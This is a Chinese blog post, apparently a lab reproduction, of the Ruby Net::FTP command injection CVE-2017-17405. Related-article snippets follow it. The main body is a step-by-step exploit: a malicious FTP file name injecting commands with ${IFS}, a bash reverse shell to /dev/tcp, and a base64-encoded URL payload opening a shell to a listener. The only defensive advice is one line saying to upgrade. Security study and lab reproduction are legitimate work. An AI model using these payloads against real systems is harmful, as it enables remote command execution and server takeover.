Ruby NetFTP模块命令注入(CVE-2017-17405)

最新推荐文章于 2024-05-07 11:00:41 发布
最新推荐文章于 2024-05-07 11:00:41 发布
阅读量730 收藏 14
点赞数 12
文章标签: ruby 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135627265
版权
文章讲述了Ruby编程语言中的RubyNet::FTP模块存在的安全漏洞,攻击者可通过恶意文件名上传利用`open`函数的系统调用来执行任意命令。复现步骤包括利用FTP服务构造反弹shell,最终可能导致服务器控制。建议用户及时升级受影响的Ruby版本以修复这一问题。
摘要由CSDN通过智能技术生成

漏洞描述:

Ruby 是一种开源的面向对象程序设计的服务器端脚本语言,在 20 世纪 90 年代中期由日本的松本行弘(まつもとゆきひろ/Yukihiro Matsumoto)设计并开发。在 Ruby 社区,松本也被称为马茨(Matz)。Ruby 可运行于多种平台,如Windows、MAC OS和UNIX的各种版本。

Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没有过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。在Ruby 2.2系列的2.2.8及更早版本、Ruby 2.3系列的2.3.5及更早版本、Ruby 2.4系列的2.4.2及更早版本、Ruby 2.5系列的2.5.0-preview1以及在主干修订版r61242之前都存在该漏洞。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.在本机安装pyftpdlib模块

pip install pyftpdlib

3.启动ftp

python3 -m pyftpdlib -p 2121 -i 0.0.0.0

4.向目标机中创建1.txt文件,空格用${IFS}代替

/download?uri=ftp://ip:2121/&file=|touch${IFS}1.txt

5.主机监听

6.构造反弹shell

bash -i >& /dev/tcp/ip/4444 0>&1

7.对反弹shell进行base64编码

8.base64编码中的加号+要替换成%2B,否则浏览器会把+编码成空格,使得命令解码出错

9.构造poc,并运行poc

/download?uri=ftp://ip:2121/&file=|bash${IFS}-c${IFS}'{echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'

10.成功监听

如此即可继承Web服务器程序的权限,去执行系统命令或读写文件,通过反弹shell控制整个网站,甚至控制整个服务器。

修复建议:

1.升级版本。

慕筱蚺
关注
CVE-2017-17405Ruby Net::FTP 模块命令注入漏洞)复现
kriesa的博客
07-13 1227
CVE-2017-17405复现
Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405
EC_Carrot的博客
07-26 419
漏洞简介 Net::FTP是其中的一个FTP客户端的实现。 Ruby 2.4.3之前的版本中的Net::FTP存在命令注入漏洞。在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 漏洞复现 访问http://your-ip:8080/将可以看到一个HTTP服务,其作用是,假如我们访问http://your-ip:8080/download?uri=ftp://examp
春秋云境CVE-2017-17405
最新发布
shr592833253的博客
05-07 300
bash -i >&/dev/tcp/ip/port 0>&1 --> base64 ---> urlencode,最后带入payload对应的位置。复现该漏洞需要我们自己起一个ftp服务,这里推荐用python的pyftpdlib,没有安装的小伙伴,可以现在自己的vps上安装一下。burpsuit重放一下请求包,vps成功反弹出shell,拿到flag!值得注意的是,得关注自己的vps有没有开启2121这个端口。,然后再进行urlencode编码,也就是,随后我们进入靶场,发现如下界面。
【春秋云镜】Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)
weixin_44632654的博客
10-17 295
2.4.3之前的Ruby允许Net :: FTP命令注入
Ruby NetFTP 模块命令注入漏洞(CVE-2017-17405
黑白的博客
12-14 1050
声明 好好学习,天天向上 漏洞描述 Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 影响范围 Ruby 2.2系列:2.2.8及更早版本 Ruby 2.3系列:2.3.5及更早版本 Ruby 2.4系列:2.4.2及更早版本 Ruby 2.5系列:2.5.0-preview1 在主干修订版r61242之前 复现
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
ruby ftp封装
weixin_34306593的博客
06-22 126
为什么80%的码农都做不了架构师?>>> ...
Ruby1.9.1released.zip
07-23
.9.1是ruby 1.9系列以来的第一个production ready的版本,这也标志着Ruby社区从此迈向了1.9的时代。 ruby 1.9是ruby发展历史上的一个里程碑版本: 1、ruby 1.9首次引入字节码即时编译技术,可以大大提高ruby本身的性能。根据之前的综合评测来看,1.9的性能大约是1.8.6的三倍左右,性能追上了Python。 2、ruby 1.9正式支持内核多线程机制,可以大大提高ruby作为服务端程序的并发处理能力 3、ruby 1.9还引入了纤程这样的多任务并发处理机制,提供了轻量级并发处理能力。 等等。ruby 1.9.1 的下载地址是:ftp://ftp.ruby-lang.org/pub/ruby/1.9/ruby-1.9.1-p0.tar.gz (windows上在http://www.ruby-lang.org/en/downloads/ 下载二进制的文件)另外,目前Rails 2.2还无法在ruby 1.9.1上面正常运行,rails的下一个版本Rails 2.3将支持ruby ...
CVE-2017-17405漏洞复现
weixin_44253823的博客
11-05 1110
Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了open函数。而在ruby中,open函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。 启动docker service docker start 在Vulhub中加载CVE-2017-14015漏洞环境。 cd vulhub/ru...
Ruby Net::FTP 模块命令注入漏洞(CVE-2017-17405)漏洞复现
weixin_51804748的博客
01-17 2052
漏洞简介 Ruby Net::FTP 模块是一个 FTP 客户端,在上传和下载文件的过程中,打开本地文件时使用了 open 函数。而在 ruby 中,open 函数是借用系统命令来打开文件,且没用过滤 shell 字符,导致在用户控制文件名的情况下,将可以注入任意命令。 Vulhub(CVE-2017-17405) 环境搭建 靶机使用vulhub ┌──(root????kali)-[~] └─# cd /root/vulhub/ruby/CVE-2017-17405
ruby socket 之 ftp
liuzhenghi的专栏
08-27 333
socket 之 ftp 应用与学习  Java代码   require 'net/ftp'      begin     ftp = Net::FTP.new()     ftp.connect("localhost", 221)     ftp.login("******", "******")     #1.Download from server
ruby通过ftp下载文件
TigerKing168的专栏
05-24 2678
Ruby 通过 FTP 下载文件   require 'net/ftp' 2    3 ftp = Net::FTP.new('ftp.ruby-lang.org') 4 ftp.passive = true 5 ftp.login
使用ruby写了一个根据ftp服务器列表自动遍历所有服务器查找对应的东东
xiaopei的博客
04-05 2665
前在ftp上下载一个东西,需要查找很多ftp-server,累~今日学习ruby,使用ruby写了 一个对应给定的ftp_list和需要查找的东东,比如lost 越狱等,遍历ftp_list里面的所有服务器,如果找到,打印服务器名和对应的路径。不过感觉效率不是很好,高手完善一下 require "net/ftp" class FTPDownload def initialize(ip_ad
使用Ruby的FTP组件将远程目录克隆到本地
猫的菜园子
10-13 278
这里以获取XFS标准文档为例,直接将远程的XFS目录克隆到本地的t子目录。 #encoding:utf-8 require 'net/ftp' HOST='ftp.cenorm.be' REMOTE_PATH='/CEN/WhatWeDo/Fields/ICT/eBusiness/WS/XFS' LOCAL_PATH='D:/Documents/WOSA/t' def fetch_file(ftp,path) $stderr.puts 'get "' + path + '"' ftp.g
使用命令行运行Ruby脚本
cumao2792的博客
09-13 2822
mac 命令行运行ruby Before really starting to use Ruby, you need to have a basic understanding of the command line. Since most Ruby scripts won't have graphical user interfaces, you'll be running them from ...
CVE-2017-3506 漏洞POC复现详细解析
资源摘要信息:"CVE-2017-3506是一种安全漏洞的编号,它由MITRE组织进行管理和分配,用于唯一标识一个特定的安全问题。CVE-2017-3506涉及的是一个远程代码执行漏洞,该漏洞存在于某些版本的Oracle Outside In ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值